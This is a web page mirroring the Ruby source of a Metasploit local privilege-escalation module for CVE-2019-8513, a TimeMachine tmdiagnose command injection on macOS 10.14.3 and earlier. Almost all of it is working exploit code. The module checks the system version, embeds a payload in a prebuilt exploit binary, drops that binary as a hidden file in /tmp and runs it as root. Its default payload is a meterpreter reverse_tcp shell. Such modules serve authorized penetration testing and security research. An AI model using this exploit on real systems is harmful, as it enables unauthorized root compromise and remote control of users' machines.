Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/osx/local/timemachine_cmd_injection.rb
Views: 11784
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = ExcellentRanking78include Msf::Post::File9include Msf::Post::OSX::Priv10include Msf::Post::OSX::System11include Msf::Exploit::EXE12include Msf::Exploit::FileDropper1314def initialize(info = {})15super(update_info(info,16'Name' => 'Mac OS X TimeMachine (tmdiagnose) Command Injection Privilege Escalation',17'Description' => %q{18This module exploits a command injection in TimeMachine on macOS <= 10.14.3 in19order to run a payload as root. The tmdiagnose binary on OSX <= 10.14.3 suffers20from a command injection vulnerability that can be exploited by creating a21specially crafted disk label.2223The tmdiagnose binary uses awk to list every mounted volume, and composes24shell commands based on the volume labels. By creating a volume label with the25backtick character, we can have our own binary executed with root priviledges.26},27'License' => MSF_LICENSE,28'Author' => [29'CodeColorist', # Discovery and exploit30'timwr', # Metasploit module31],32'References' => [33['CVE', '2019-8513'],34['URL', 'https://medium.com/0xcc/rootpipe-reborn-part-i-cve-2019-8513-timemachine-root-command-injection-47e056b3cb43'],35['URL', 'https://support.apple.com/en-in/HT209600'],36['URL', 'https://github.com/ChiChou/sploits'],37],38'DefaultTarget' => 0,39'DefaultOptions' => { 'WfsDelay' => 300, 'PAYLOAD' => 'osx/x64/meterpreter/reverse_tcp' },40'Targets' => [41[ 'Mac OS X x64 (Native Payload)', { 'Arch' => ARCH_X64, 'Platform' => [ 'osx' ] } ],42[ 'Python payload', { 'Arch' => ARCH_PYTHON, 'Platform' => [ 'python' ] } ],43[ 'Command payload', { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] } ],44],45'DisclosureDate' => '2019-04-13'))46register_advanced_options [47OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])48]49end5051def upload_executable_file(filepath, filedata)52print_status("Uploading file: '#{filepath}'")53write_file(filepath, filedata)54chmod(filepath)55register_file_for_cleanup(filepath)56end5758def check59version = Rex::Version.new(get_system_version)60if version >= Rex::Version.new('10.14.4')61CheckCode::Safe62else63CheckCode::Appears64end65end6667def exploit68if check != CheckCode::Appears69fail_with Failure::NotVulnerable, 'Target is not vulnerable'70end7172if is_root?73fail_with Failure::BadConfig, 'Session already has root privileges'74end7576unless writable? datastore['WritableDir']77fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"78end7980exploit_data = File.binread(File.join(Msf::Config.data_directory, "exploits", "CVE-2019-8513", "exploit" ))81if target['Arch'] == ARCH_X6482root_cmd = payload.encoded83else84root_cmd = payload.raw85if target['Arch'] == ARCH_PYTHON86root_cmd = "echo \"#{root_cmd}\" | python"87end88root_cmd = "CMD:#{root_cmd}"89end90if root_cmd.length > 102491fail_with Failure::PayloadFailed, "Payload size (#{root_cmd.length}) exceeds space in payload placeholder"92end9394placeholder_index = exploit_data.index('ROOT_PAYLOAD_PLACEHOLDER')95exploit_data[placeholder_index, root_cmd.length] = root_cmd9697exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text::rand_text_alpha_lower(6..12)}"98upload_executable_file(exploit_file, exploit_data)99100print_status("Executing exploit '#{exploit_file}'")101result = cmd_exec(exploit_file)102print_status("Exploit result:\n#{result}")103end104end105106107